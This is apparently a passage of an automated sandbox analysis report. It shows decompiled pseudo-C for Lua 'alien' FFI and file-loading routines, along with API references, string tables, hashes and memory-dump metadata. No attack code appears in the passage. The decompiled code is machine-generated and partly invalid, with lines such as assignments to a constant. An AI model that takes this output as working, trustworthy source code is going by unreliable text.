												 *__ecx = __eax;
												__eax = __ecx;
												__ecx = _v16;
												 *(__ecx + __edi) = __eax;
											}
										}
										goto L73;
									case 0xc:
										__eax = 4;
										__eax = E00A246A0(4);
										_v12 = __esp;
										_push(__ebx);
										_push(__esi);
										L00A23F4A();
										__esp = __esp + 8;
										if(__eax != 0) {
											_push(__ebx);
											_push(__esi);
											L00A23F56();
											__esp = __esp + 8;
											if(__eax == 0) {
												_push(__ebx);
												_push(__esi);
												L00A23F0E();
												__ecx = _v12;
												 *__ecx = __eax;
												__eax = _v16;
												__esp = __esp + 8;
												 *(__eax + __edi) = __ecx;
											} else {
												_push(0);
												_push(__ebx);
												_push(__esi);
												L00A23F5C();
												__ecx = _v12;
												 *__ecx = __eax;
												__eax = _v16;
												__esp = __esp + 0xc;
												 *(__eax + __edi) = __ecx;
											}
										} else {
											__ecx = _v12;
											 *__ecx = __eax;
											__eax = _v16;
											 *(__eax + __edi) = __ecx;
										}
										goto L73;
									case 0xd:
										_push(__ebx);
										_push(__esi);
										L00A23F68();
										__esp = __esp + 8;
										__eax = E00A245C0(__eax, __fp0);
										__ecx = _v40;
										 *_v40 = __eax;
										4 = E00A246A0(4);
										__ecx = _v40;
										__edx = _v16;
										__eax = __esp;
										 *__eax = __ecx;
										__ecx = __ecx + 4;
										 *(__edx + __edi) = __eax;
										_v40 = __ecx;
										goto L73;
									case 0xe:
										_push(__ebx);
										_push(__esi);
										L00A23F68();
										asm("fnstcw word [ebp-0xe]");
										__eax = _v18 & 0x0000ffff;
										__ecx = _v44;
										__eax = _v18 & 0x0000ffff | 0x00000c00;
										_v28 = _v18 & 0x0000ffff | 0x00000c00;
										__esp = __esp + 8;
										asm("fldcw word [ebp-0x18]");
										asm("fistp qword [ebp-0x1c]");
										__eax = _v32;
										 *_v44 = _v32;
										__eax = 4;
										asm("fldcw word [ebp-0xe]");
										__eax = E00A246A0(4);
										__ecx = _v44;
										__edx = _v16;
										__eax = __esp;
										 *__eax = __ecx;
										__ecx = __ecx + 4;
										 *(__edx + __edi) = __eax;
										_v44 = __ecx;
										goto L73;
									case 0xf:
										_push(__ebx);
										_push(__esi);
										L00A23F68();
										__esp = __esp + 8;
										__eax = E00A245C0(__eax, __fp0);
										__ecx = _v48;
										 *_v48 = __al;
										4 = E00A246A0(4);
										__ecx = _v48;
										__edx = _v16;
										__eax = __esp;
										 *__eax = __ecx;
										__ecx = __ecx + 1;
										 *(__edx + __edi) = __eax;
										_v48 = __ecx;
										goto L73;
									case 0x10:
										_push(__ebx);
										_push(__esi);
										L00A23F68();
										__eax = _v68;
										 *_v68 = __fp0;
										__esp = __esp + 8;
										4 = E00A246A0(4);
										__ecx = _v68;
										__edx = _v16;
										__eax = __esp;
										 *__eax = __ecx;
										__ecx = __ecx + 8;
										 *(__edx + __edi) = __eax;
										_v68 = __ecx;
										goto L73;
									case 0x11:
										__eax = 4;
										__eax = E00A246A0(4);
										_v12 = __esp;
										__eax = E00A21110(__eax, __ebx, __esi, "alien_callback");
										if(__eax == 0) {
											__eax = E00A21110(__eax, __ebx, __esi, "alien_function");
											if(__eax == 0) {
												_push("alien function or callback expected");
												_push(__ebx);
												_push(__esi);
												L00A23F14();
												__ecx = _v12;
												__edx = _v16;
												__esp = __esp + 0xc;
												__eax = 0;
												 *__ecx = 0;
												 *(__edx + __edi) = __ecx;
											} else {
												__eax =  *(__eax + 4);
												__ecx = _v12;
												__edx = _v16;
												 *__ecx = __eax;
												 *(__edx + __edi) = __ecx;
											}
										} else {
											__eax =  *__eax;
											__ecx = _v12;
											__edx = _v16;
											 *__ecx = __eax;
											 *(__edx + __edi) = __ecx;
										}
										goto L73;
								}
								L73:
								_v16 = _v16 + 4;
								_t310 = _t310 + 1;
								_t158 =  &_v80;
								 *_t158 = _v80 - 1;
							} while ( *_t158 != 0);
							goto L74;
						}
					}
					_t312 =  *((intOrPtr*)(_t309 + 0x30));
					do {
						_t292 =  *_t312 + 0xfffffff3;
						if(_t292 > 3) {
							goto L23;
						}
						switch( *((intOrPtr*)(_t292 * 4 +  &M00A2286C))) {
							case 0:
								_t313 = _t313 + 1;
								goto L23;
							case 1:
								__edx = __edx + 1;
								goto L23;
							case 2:
								_v52 = _v52 + 1;
								goto L23;
							case 3:
								_v56 = _v56 + 1;
								goto L23;
						}
						L23:
						_t312 = _t312 + 4;
						_t335 = _t335 - 1;
					} while (_t335 != 0);
					_v60 = _t326;
					_v76 = _t313;
					if(_t313 > 0) {
						E00A24670(_t313 * 4);
						_t326 = _v60;
						_v40 = _t343;
					}
					if(_t326 > 0) {
						E00A24670(_v60 + _v60 + _v60 + _v60);
						_v44 = _t343;
					}
					if(_v56 > 0) {
						E00A24670(_v56 + _v56 + _v56 + _v56 + _v56 + _v56 + _v56 + _v56);
						_v68 = _t343;
					}
					if(_v52 > 0) {
						E00A24670(_v52);
						_v48 = _t343;
					}
					goto L32;
				}
			}

0x00a21ef0
0x00a21ef6
0x00a21efd
0x00a21f02
0x00a21f10
0x00a21f15
0x00a21f1a
0x00a21f28
0x00a21f2d
0x00a21f32
0x00a21f3b
0x00a21f40
0x00a21f42
0x00a21f43
0x00a21f48
0x00a21f4b
0x00a21f34
0x00a21f34
0x00a21f36
0x00a21f36
0x00a21f4d
0x00a21f1c
0x00a21f1c
0x00a21f1e
0x00a21f1e
0x00a21f50
0x00a21f53
0x00a21f54
0x00a21f57
0x00a21f5c
0x00a21f5f
0x00a21f64
0x00a21f67
0x00a21f80
0x00000000
0x00000000
0x00a21f82
0x00a21f87
0x00a21f89
0x00a21f89
0x00a21f8e
0x00a21f8f
0x00000000
0x00a21f69
0x00a21f69
0x00a21f6e
0x00a21f70
0x00a21f70
0x00a21f75
0x00a21f76
0x00a21f94
0x00a21f94
0x00a21f95
0x00a21f9a
0x00a21f9d
0x00a21f9d
0x00a21f9f
0x00a21fa3
0x00a21fa6
0x00a21fa9
0x00a21fac
0x00a21faf
0x00a2203c
0x00a22040
0x00a22052
0x00a22042
0x00a22049
0x00a2204e
0x00a2204e
0x00a22059
0x00a2205e
0x00a224fd
0x00a224fd
0x00a22500
0x00a22507
0x00a2250d
0x00a22753
0x00a22758
0x00a2275a
0x00a2275a
0x00a2275f
0x00a22760
0x00a22765
0x00a22766
0x00a2276b
0x00a2276b
0x00a2276e
0x00a22781
0x00a2278a
0x00a22790
0x00a22795
0x00a2279d
0x00a227a0
0x00a22843
0x00a22868
0x00000000
0x00000000
0x00000000
0x00a227a6
0x00a227a6
0x00a227af
0x00a227b5
0x00000000
0x00000000
0x00a227bb
0x00000000
0x00a227c5
0x00a227c7
0x00a227ca
0x00a227cd
0x00a227ce
0x00a227d3
0x00a227d6
0x00000000
0x00000000
0x00a227dc
0x00a227df
0x00a227e1
0x00a227e5
0x00a227e7
0x00a227e7
0x00a227ed
0x00a227f0
0x00a227f3
0x00a227f4
0x00a227f9
0x00a227fc
0x00000000
0x00000000
0x00a22818
0x00a2281b
0x00a2281e
0x00a22821
0x00a22824
0x00a22827
0x00a2282a
0x00a2282b
0x00a22830
0x00a22833
0x00000000
0x00000000
0x00a22802
0x00a22804
0x00a22807
0x00a2280a
0x00a2280b
0x00a22810
0x00a22813
0x00000000
0x00000000
0x00a22837
0x00a22837
0x00a2283a
0x00000000
0x00a227a6
0x00a22513
0x00000000
0x00a2253b
0x00a2253e
0x00a22542
0x00a22547
0x00a2254b
0x00a22550
0x00a22554
0x00a22557
0x00a2255a
0x00a2255d
0x00a22560
0x00a22561
0x00000000
0x00000000
0x00a225bd
0x00a225c0
0x00a225c4
0x00a225c4
0x00a225c9
0x00a225cd
0x00a225d2
0x00a225d6
0x00a225d9
0x00a225dc
0x00a225df
0x00a225e2
0x00a225e3
0x00000000
0x00000000
0x00a22594
0x00a22597
0x00a2259b
0x00a2259b
0x00a225a0
0x00a225a4
0x00a225a9
0x00a225ac
0x00a225af
0x00a225b2
0x00a225b3
0x00000000
0x00000000
0x00a22624
0x00a22624
0x00a22628
0x00a2262b
0x00a2262f
0x00a22633
0x00a22638
0x00a2263b
0x00000000
0x00000000
0x00a2256c
0x00a2256c
0x00a22570
0x00a22573
0x00a22577
0x00a2257b
0x00a22580
0x00a22583
0x00a22586
0x00a22589
0x00a2258a
0x00000000
0x00000000
0x00a225ee
0x00a225ee
0x00a225f2
0x00a225f5
0x00a225f9
0x00a225fd
0x00a22602
0x00a22605
0x00a22608
0x00a2260a
0x00a2260c
0x00a2260c
0x00a22612
0x00a22615
0x00a22618
0x00a22619
0x00000000
0x00000000
0x00a22528
0x00a2252d
0x00a2252e
0x00a22533
0x00000000
0x00000000
0x00a226a1
0x00a226a1
0x00a226a5
0x00a226a8
0x00a226ac
0x00a226b0
0x00a226b5
0x00a226b8
0x00a226bb
0x00a226be
0x00a226bf
0x00000000
0x00000000
0x00a226c9
0x00a226cc
0x00a226d0
0x00a226d0
0x00a226d5
0x00a226d9
0x00a226de
0x00a226e1
0x00a226e4
0x00a226e7
0x00a226e8
0x00000000
0x00000000
0x00a22641
0x00a22641
0x00a22645
0x00a22648
0x00a2264c
0x00a22650
0x00a22655
0x00a22659
0x00a2265c
0x00a2265f
0x00a22662
0x00a22665
0x00a22666
0x00000000
0x00000000
0x00a22671
0x00a22671
0x00a22675
0x00a22678
0x00a2267c
0x00a22680
0x00a22685
0x00a22689
0x00a2268c
0x00a2268f
0x00a22692
0x00a22695
0x00a22696
0x00000000
0x00000000
0x00a226f2
0x00a226f5
0x00a226f9
0x00a226f9
0x00a22702
0x00a22707
0x00a2270f
0x00000000
0x00000000
0x00a22711
0x00a22712
0x00a22713
0x00a22718
0x00000000
0x00000000
0x00a22728
0x00a2272b
0x00a2272f
0x00a2272f
0x00a22738
0x00a2273d
0x00a22745
0x00a2271d
0x00a2271d
0x00a2271e
0x00a22723
0x00000000
0x00a22723
0x00a22747
0x00a22748
0x00a22749
0x00a2274e
0x00000000
0x00000000
0x00a22064
0x00a22067
0x00a2206e
0x00a22071
0x00a22071
0x00a22074
0x00a2207a
0x00a22080
0x00a224d0
0x00a224d0
0x00a224d5
0x00a224d7
0x00a224d7
0x00a224dc
0x00a224dd
0x00a224de
0x00a224e3
0x00a224e4
0x00a224e9
0x00000000
0x00a224e9
0x00a22086
0x00000000
0x00a22092
0x00a22097
0x00a2209a
0x00a2209b
0x00a2209c
0x00a220a1
0x00a220a4
0x00a220a9
0x00a220ac
0x00a220af
0x00a220b2
0x00000000
0x00000000
0x00a22117
0x00a2211c
0x00a2211f
0x00a22120
0x00a22121
0x00a22126
0x00a22129
0x00a2212d
0x00a22130
0x00a22133
0x00a22138
0x00a2213b
0x00a2213e
0x00a22141
0x00a22148
0x00a2214b
0x00a2214e
0x00000000
0x00000000
0x00a220e6
0x00a220eb
0x00a220f0
0x00a220f3
0x00a220f4
0x00a220f5
0x00a220fa
0x00a220fd
0x00a22102
0x00a22105
0x00a22108
0x00a2210a
0x00000000
0x00000000
0x00a2219d
0x00a221a2
0x00a221a5
0x00a221a6
0x00a221a7
0x00a221ac
0x00a221af
0x00a221b3
0x00a221b6
0x00a221b9
0x00a221be
0x00a221c1
0x00a221c4
0x00a221c7
0x00a221ca
0x00a221cd
0x00a221cf
0x00a221d2
0x00000000
0x00000000
0x00a220ba
0x00a220bf
0x00a220c4
0x00a220c7
0x00a220c8
0x00a220c9
0x00a220ce
0x00a220d1
0x00a220d6
0x00a220d9
0x00a220db
0x00a220de
0x00000000
0x00000000
0x00a2215b
0x00a22160
0x00a22163
0x00a22164
0x00a22165
0x00a2216a
0x00a2216d
0x00a22171
0x00a22174
0x00a22177
0x00a2217c
0x00a2217f
0x00a22182
0x00a22185
0x00a22188
0x00a2218b
0x00a2218d
0x00a22190
0x00000000
0x00000000
0x00000000
0x00000000
0x00a2222d
0x00a22232
0x00a22235
0x00a22236
0x00a22237
0x00a2223c
0x00a2223f
0x00a22242
0x00a22244
0x00a22247
0x00000000
0x00000000
0x00a22254
0x00a22259
0x00a2225c
0x00a2225d
0x00a2225e
0x00a22263
0x00a22266
0x00a22269
0x00a2226b
0x00a2226e
0x00000000
0x00000000
0x00a221df
0x00a221e4
0x00a221e7
0x00a221e8
0x00a221e9
0x00a221ee
0x00a221f1
0x00a221f3
0x00a221f6
0x00a221f9
0x00000000
0x00000000
0x00a22201
0x00a22206
0x00a2220b
0x00a2220e
0x00a2220f
0x00a22210
0x00a22215
0x00a22218
0x00a2221b
0x00a2221d
0x00a22220
0x00000000
0x00000000
0x00a22276
0x00a2227b
0x00a22280
0x00a22283
0x00a22284
0x00a22285
0x00a2228a
0x00a2228f
0x00a22290
0x00a22291
0x00a222cd
0x00a222d2
0x00a222d7
0x00a222eb
0x00a222ed
0x00a222ee
0x00a222ef
0x00a222f4
0x00a222f7
0x00a222fa
0x00a222fc
0x00a222fe
0x00a22301
0x00a222d9
0x00a222d9
0x00a222dc
0x00a222df
0x00a222e1
0x00a222e3
0x00a222e3
0x00a22293
0x00a22293
0x00a22298
0x00a2229d
0x00a222b1
0x00a222b2
0x00a222b3
0x00a222b8
0x00a222bb
0x00a222bd
0x00a222bf
0x00a222c2
0x00a222c5
0x00a2229f
0x00a2229f
0x00a222a2
0x00a222a4
0x00a222a6
0x00a222a9
0x00a222a9
0x00a2229d
0x00000000
0x00000000
0x00a2237e
0x00a22383
0x00a22388
0x00a2238b
0x00a2238c
0x00a2238d
0x00a22392
0x00a22397
0x00a223a9
0x00a223aa
0x00a223ab
0x00a223b0
0x00a223b5
0x00a223d3
0x00a223d4
0x00a223d5
0x00a223da
0x00a223dd
0x00a223df
0x00a223e2
0x00a223e5
0x00a223b7
0x00a223b7
0x00a223b9
0x00a223ba
0x00a223bb
0x00a223c0
0x00a223c3
0x00a223c5
0x00a223c8
0x00a223cb
0x00a223cb
0x00a22399
0x00a22399
0x00a2239c
0x00a2239e
0x00a223a1
0x00a223a1
0x00000000
0x00000000
0x00a223ed
0x00a223ee
0x00a223ef
0x00a223f4
0x00a223f7
0x00a223fc
0x00a223ff
0x00a22406
0x00a2240b
0x00a2240e
0x00a22411
0x00a22413
0x00a22415
0x00a22418
0x00a2241b
0x00000000
0x00000000
0x00a22423
0x00a22424
0x00a22425
0x00a2242a
0x00a2242d
0x00a22431
0x00a22434
0x00a22439
0x00a2243c
0x00a2243f
0x00a22442
0x00a22445
0x00a22448
0x00a2244a
0x00a2244f
0x00a22452
0x00a22457
0x00a2245a
0x00a2245d
0x00a2245f
0x00a22461
0x00a22464
0x00a22467
0x00000000
0x00000000
0x00a2246f
0x00a22470
0x00a22471
0x00a22476
0x00a22479
0x00a2247e
0x00a22481
0x00a22488
0x00a2248d
0x00a22490
0x00a22493
0x00a22495
0x00a22497
0x00a2249a
0x00a2249d
0x00000000
0x00000000
0x00a224a2
0x00a224a3
0x00a224a4
0x00a224a9
0x00a224ac
0x00a224ae
0x00a224b6
0x00a224bb
0x00a224be
0x00a224c1
0x00a224c3
0x00a224c5
0x00a224c8
0x00a224cb
0x00000000
0x00000000
0x00a22309
0x00a2230e
0x00a22313
0x00a2231b
0x00a22325
0x00a2233e
0x00a22348
0x00a2235d
0x00a22362
0x00a22363
0x00a22364
0x00a22369
0x00a2236c
0x00a2236f
0x00a22372
0x00a22374
0x00a22376
0x00a2234a
0x00a2234a
0x00a2234d
0x00a22350
0x00a22353
0x00a22355
0x00a22355
0x00a22327
0x00a22327
0x00a22329
0x00a2232c
0x00a2232f
0x00a22331
0x00a22331
0x00000000
0x00000000
0x00a224ec
0x00a224ec
0x00a224f0
0x00a224f3
0x00a224f3
0x00a224f3
0x00000000
0x00a22071
0x00a2205e
0x00a21fb5
0x00a21fb8
0x00a21fba
0x00a21fc0
0x00000000
0x00000000
0x00a21fc2
0x00000000
0x00a21fc9
0x00000000
0x00000000
0x00a21fce
0x00000000
0x00000000
0x00a21fd9
0x00000000
0x00000000
0x00a21fd3
0x00000000
0x00000000
0x00a21fdd
0x00a21fdd
0x00a21fe0
0x00a21fe0
0x00a21fe7
0x00a21fea
0x00a21fed
0x00a21ff6
0x00a21ffb
0x00a21ffe
0x00a21ffe
0x00a22003
0x00a2200c
0x00a22011
0x00a22011
0x00a22018
0x00a22023
0x00a22028
0x00a22028
0x00a2202f
0x00a22034
0x00a22039
0x00a22039
0x00000000
0x00a2202f

APIs

Part of subcall function 00A21110: lua_touserdata.LUA5.1(?,00000001,?,00A22DF6,alien_buffer), ref: 00A21113
Part of subcall function 00A21110: lua_getmetatable.LUA5.1(?,00000001), ref: 00A21123
Part of subcall function 00A21110: lua_getfield.LUA5.1(?,FFFFD8F0,?), ref: 00A2113A
Part of subcall function 00A21110: lua_rawequal.LUA5.1(?,000000FF,000000FE,?,FFFFD8F0,?), ref: 00A21144
Part of subcall function 00A21110: lua_settop.LUA5.1(?,000000FD), ref: 00A21153

lua_gettop.LUA5.1(?), ref: 00A21F57
luaL_error.LUA5.1(?,alien: too many arguments (function %s),?), ref: 00A21F95
__alloca_probe_16.LIBCMT ref: 00A21FF6
__alloca_probe_16.LIBCMT ref: 00A2200C
__alloca_probe_16.LIBCMT ref: 00A22023
__alloca_probe_16.LIBCMT ref: 00A22034
__alloca_probe_16.LIBCMT ref: 00A22049
lua_tonumber.LUA5.1(?,00000002), ref: 00A2209C
lua_pushnil.LUA5.1(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A2252E
lua_tonumber.LUA5.1(?,00000002), ref: 00A220C9

Part of subcall function 00A24130: __alloca_probe_16.LIBCMT ref: 00A24160

lua_pushnumber.LUA5.1(?), ref: 00A227CE
lua_pushnumber.LUA5.1(?), ref: 00A227F4
lua_pushnumber.LUA5.1(?), ref: 00A2280B
lua_pushnumber.LUA5.1(?), ref: 00A2282B

Strings

alien: parameter %i is of unknown type (function %s), xrefs: 00A224DE
alien: unknown return type (function %s), xrefs: 00A22760
alien: too many arguments (function %s), xrefs: 00A21F8F
anonymous, xrefs: 00A21F70, 00A21F75, 00A21F89, 00A21F8E, 00A224D7, 00A224DC, 00A2275A, 00A2275F
alien_function, xrefs: 00A21F06
alien_callback, xrefs: 00A21F23
alien: too few arguments (function %s), xrefs: 00A21F76
alien function or callback expected, xrefs: 00A21F3B

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: __alloca_probe_16$lua_pushnumber.$lua_tonumber.$L_error.lua_getfield.lua_getmetatable.lua_gettop.lua_pushnil.lua_rawequal.lua_settop.lua_touserdata.
String ID: alien function or callback expected$alien: parameter %i is of unknown type (function %s)$alien: too few arguments (function %s)$alien: too many arguments (function %s)$alien: unknown return type (function %s)$alien_callback$alien_function$anonymous
API String ID: 2708324100-3306112838
Opcode ID: d5bf82f0dc17963dd9e0c8a98e113adbc6295c715b91f4a751fb481cf990132c
Instruction ID: 6f8d79fad0a8c1676756b31dfe2ffba5e44fe3e1b786259e2a799107b4599727
Opcode Fuzzy Hash: d5bf82f0dc17963dd9e0c8a98e113adbc6295c715b91f4a751fb481cf990132c
Instruction Fuzzy Hash: 13127FB5D04129EBDB04EF9CFA82AAEBBB4FF49300F144179F404AB242D7359A51CB65

Uniqueness

Uniqueness Score: -1.00%

Function 1000FD30, Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 170
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000FD30(void* __eflags, intOrPtr _a4, char* _a8) {
				struct _IO_FILE* _v516;
				char _v520;
				intOrPtr _v524;
				void* _t22;
				struct _IO_FILE* _t24;
				int _t25;
				struct _IO_FILE* _t29;
				struct _IO_FILE* _t37;
				char* _t42;
				void* _t43;
				struct _IO_FILE* _t47;
				signed int _t60;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t70;

				_t55 = _a4;
				_t22 = E10001150(_a4);
				_t42 = _a8;
				_t64 =  &_v524 + 4;
				_t57 = _t22 + 1;
				_v520 = 0;
				_v524 = _t22 + 1;
				if(_t42 != 0) {
					E100019F0(_t55, "@%s", _t42);
					_t24 = fopen(_t42, "r"); // executed
					_t65 = _t64 + 0x14;
					_v516 = _t24;
					__eflags = _t24;
					if(__eflags != 0) {
						goto L2;
					} else {
						return E1000FF90(_t24, __eflags, _t55, "open", _t57);
					}
				} else {
					E10001930(_t55, "=stdin", 6);
					_t24 = __imp___iob;
					_t65 = _t64 + 0xc;
					_v516 = _t24;
					L2:
					_t25 = getc(_t24); // executed
					_t66 = _t65 + 4;
					if(_t25 == 0x23) {
						_v520 = 1;
						_t25 = getc(_v516);
						_t66 = _t66 + 4;
						if(_t25 == 0xffffffff) {
							L6:
							if(_t25 == 0xa) {
								goto L7;
							}
						} else {
							while(_t25 != 0xa) {
								_t25 = getc(_v516);
								_t66 = _t66 + 4;
								if(_t25 != 0xffffffff) {
									continue;
								} else {
									goto L6;
								}
								goto L8;
							}
							L7:
							_t25 = getc(_v516);
							_t66 = _t66 + 4;
						}
					}
					L8:
					if(_t25 !=  *0x10019298) {
						L18:
						ungetc(_t25, _v516);
						_t43 = E100021F0(_t55, E1000FF30,  &_v520, E100016F0(__eflags, _t55, 0xffffffff, 0));
						_t29 = _v516;
						_t67 = _t66 + 0x24;
						_t60 =  *(_t29 + 0xc) & 0x00000020;
						__eflags = _t29 - __imp___iob;
						if(_t29 != __imp___iob) {
							fclose(_t29); // executed
							_t67 = _t67 + 4;
						}
						__eflags = _t60;
						if(__eflags == 0) {
							E100011B0(__eflags, _t55, _v524);
							return _t43;
						} else {
							_t61 = _v524;
							return E1000FF90(E10001160(_t55, _v524), __eflags, _t55, "read", _t61);
						}
					} else {
						_t47 = _v516;
						if(_t47 == __imp___iob) {
							goto L18;
						} else {
							fclose(_t47);
							_t37 = fopen(_t42, "rb");
							_t70 = _t66 + 0xc;
							_v516 = _t37;
							_t82 = _t37;
							if(_t37 != 0) {
								_t25 = getc(_t37);
								_t66 = _t70 + 4;
								__eflags = _t25 - 0xffffffff;
								if(__eflags != 0) {
									while(1) {
										__eflags = _t25 -  *0x10019298;
										if(__eflags == 0) {
											goto L17;
										}
										_t25 = getc(_v516);
										_t66 = _t66 + 4;
										__eflags = _t25 - 0xffffffff;
										if(__eflags != 0) {
											continue;
										}
										goto L17;
									}
								}
								L17:
								_v520 = 0;
								goto L18;
							} else {
								return E1000FF90(_t37, _t82, _t55, "reopen", _v524);
							}
						}
					}
				}
			}

0x1000fd3a
0x1000fd42
0x1000fd47
0x1000fd56
0x1000fd59
0x1000fd5a
0x1000fd64
0x1000fd68
0x1000fe32
0x1000fe3d
0x1000fe3f
0x1000fe42
0x1000fe46
0x1000fe48
0x00000000
0x1000fe4e
0x1000fe67
0x1000fe67
0x1000fd6e
0x1000fd76
0x1000fd7b
0x1000fd80
0x1000fd83
0x1000fd87
0x1000fd8e
0x1000fd90
0x1000fd96
0x1000fd9c
0x1000fda5
0x1000fda7
0x1000fdad
0x1000fdc3
0x1000fdc6
0x00000000
0x00000000
0x1000fdaf
0x1000fdaf
0x1000fdb9
0x1000fdbb
0x1000fdc1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1000fdc1
0x1000fdc8
0x1000fdcd
0x1000fdcf
0x1000fdcf
0x1000fdad
0x1000fdd2
0x1000fddb
0x1000fe95
0x1000fe9b
0x1000fec2
0x1000fec4
0x1000fec8
0x1000fece
0x1000fed1
0x1000fed3
0x1000fed6
0x1000fedc
0x1000fedc
0x1000fedf
0x1000fee1
0x1000ff0e
0x1000ff22
0x1000fee3
0x1000fee3
0x1000ff07
0x1000ff07
0x1000fde1
0x1000fde1
0x1000fded
0x00000000
0x1000fdf3
0x1000fdf4
0x1000fe00
0x1000fe02
0x1000fe05
0x1000fe09
0x1000fe0b
0x1000fe69
0x1000fe6b
0x1000fe6e
0x1000fe71
0x1000fe73
0x1000fe7a
0x1000fe7c
0x00000000
0x00000000
0x1000fe83
0x1000fe85
0x1000fe88
0x1000fe8b
0x00000000
0x00000000
0x00000000
0x1000fe8b
0x1000fe73
0x1000fe8d
0x1000fe8d
0x00000000
0x1000fe0d
0x1000fe2a
0x1000fe2a
0x1000fe0b
0x1000fded
0x1000fddb

APIs

lua_gettop.LUA5.1(?), ref: 1000FD42
lua_pushlstring.LUA5.1(?,=stdin,00000006), ref: 1000FD76

Part of subcall function 10001930: luaS_newlstr.LUA5.1(?,?,?), ref: 1000195A

getc.MSVCRT(00000000), ref: 1000FD8E
getc.MSVCRT(?), ref: 1000FDA5
getc.MSVCRT(?), ref: 1000FDB9
getc.MSVCRT(?), ref: 1000FDCD
fclose.MSVCRT ref: 1000FDF4
fopen.MSVCRT ref: 1000FE00
lua_pushfstring.LUA5.1(?,@%s,?), ref: 1000FE32
fopen.MSVCRT ref: 1000FE3D
getc.MSVCRT(00000000), ref: 1000FE69
getc.MSVCRT(?), ref: 1000FE83
ungetc.MSVCRT ref: 1000FE9B
lua_tolstring.LUA5.1(?,000000FF,00000000), ref: 1000FEA6
lua_load.LUA5.1(?,1000FF30,?,00000000,?,000000FF,00000000), ref: 1000FEB7
fclose.MSVCRT ref: 1000FED6
lua_settop.LUA5.1(?,?), ref: 1000FEE9
lua_remove.LUA5.1(?,?), ref: 1000FF0E

Strings

@%s, xrefs: 1000FE2C
reopen, xrefs: 1000FE12
open, xrefs: 1000FE4F
=stdin, xrefs: 1000FD70
read, xrefs: 1000FEEF

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: getc$fclosefopen$S_newlstr.lua_gettop.lua_load.lua_pushfstring.lua_pushlstring.lua_remove.lua_settop.lua_tolstring.ungetc
String ID: =stdin$@%s$open$read$reopen
API String ID: 1269628050-2372923574
Opcode ID: fc4c290e80454898a543fe12c564c74f4d1636405d640bb03713f8169e5be4c9
Instruction ID: d4281e0863b9b40dc0e10b84b1f7c332c43d3e0b7381b2d391674a6731b728a1
Opcode Fuzzy Hash: fc4c290e80454898a543fe12c564c74f4d1636405d640bb03713f8169e5be4c9
Instruction Fuzzy Hash: 8D4157B190431167F210DB24ACC0EBF37A8EFC92E0F140A2DF95886256E735E94997E3

Uniqueness

Uniqueness Score: -1.00%

Function 00A22309, Relevance: 35.3, APIs: 17, Strings: 3, Instructions: 339
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00A22309(void* __ebx, void* __edi, void* __esi, long long __fp0) {
				void* _t220;
				void* _t221;
				void* _t222;
				signed int _t225;
				char* _t226;
				signed int _t227;
				char* _t228;
				signed int _t239;
				void* _t247;
				void* _t249;
				intOrPtr* _t250;
				intOrPtr _t251;
				intOrPtr _t252;
				intOrPtr* _t262;
				void* _t272;
				signed int _t273;
				void* _t274;
				void* _t275;
				void* _t276;
				signed int _t277;
				intOrPtr _t279;
				void* _t280;
				intOrPtr _t281;
				void* _t282;
				long long _t294;

				L0:
				while(1) {
					L0:
					_t294 = __fp0;
					_t275 = __esi;
					_t272 = __edi;
					_t247 = __ebx;
					_t220 = E00A246A0(4);
					 *((intOrPtr*)(_t277 - 8)) = _t279;
					_t221 = E00A21110(_t220, __ebx, __esi, "alien_callback");
					_t280 = _t279 + 4;
					if(_t221 == 0) {
						_t222 = E00A21110(_t221, __ebx, __esi, "alien_function");
						_t281 = _t280 + 4;
						if(_t222 == 0) {
							_push("alien function or callback expected");
							_push(__ebx);
							_push(__esi);
							L00A23F14();
							_t250 =  *((intOrPtr*)(_t277 - 8));
							_t281 = _t281 + 0xc;
							 *_t250 = 0;
							 *((intOrPtr*)( *((intOrPtr*)(_t277 - 0xc)) + __edi)) = _t250;
						} else {
							_t262 =  *((intOrPtr*)(_t277 - 8));
							_t263 =  *((intOrPtr*)(_t277 - 0xc));
							 *_t262 =  *((intOrPtr*)(_t222 + 4));
							 *((intOrPtr*)( *((intOrPtr*)(_t277 - 0xc)) + __edi)) = _t262;
						}
					} else {
						__eax =  *__eax;
						__ecx =  *(__ebp - 8);
						__edx =  *(__ebp - 0xc);
						 *__ecx = __eax;
						 *(__edx + __edi) = __ecx;
					}
					while(1) {
						L36:
						 *((intOrPtr*)(_t277 - 0xc)) =  *((intOrPtr*)(_t277 - 0xc)) + 4;
						_t247 = _t247 + 1;
						_t116 = _t277 - 0x4c;
						 *_t116 =  *((intOrPtr*)(_t277 - 0x4c)) - 1;
						if( *_t116 == 0) {
							break;
						}
						L1:
						_t251 =  *((intOrPtr*)(_t277 - 0x14));
						_t263 =  *((intOrPtr*)(_t251 + 0x30));
						_t225 =  *( *((intOrPtr*)(_t277 - 0xc)) +  *((intOrPtr*)(_t251 + 0x30)));
						if(_t225 > 0x11) {
							L33:
							_t226 =  *(_t251 + 8);
							if(_t226 == 0) {
								_t226 = "anonymous";
							}
							_push(_t226);
							_push(_t247);
							_push("alien: parameter %i is of unknown type (function %s)");
							_push(_t275);
							L00A23F26();
							_t281 = _t281 + 0x10;
							continue;
						}
						L2:
						switch( *((intOrPtr*)(_t225 * 4 +  &M00A2287C))) {
							case 0:
								L3:
								_t244 = E00A246A0(4);
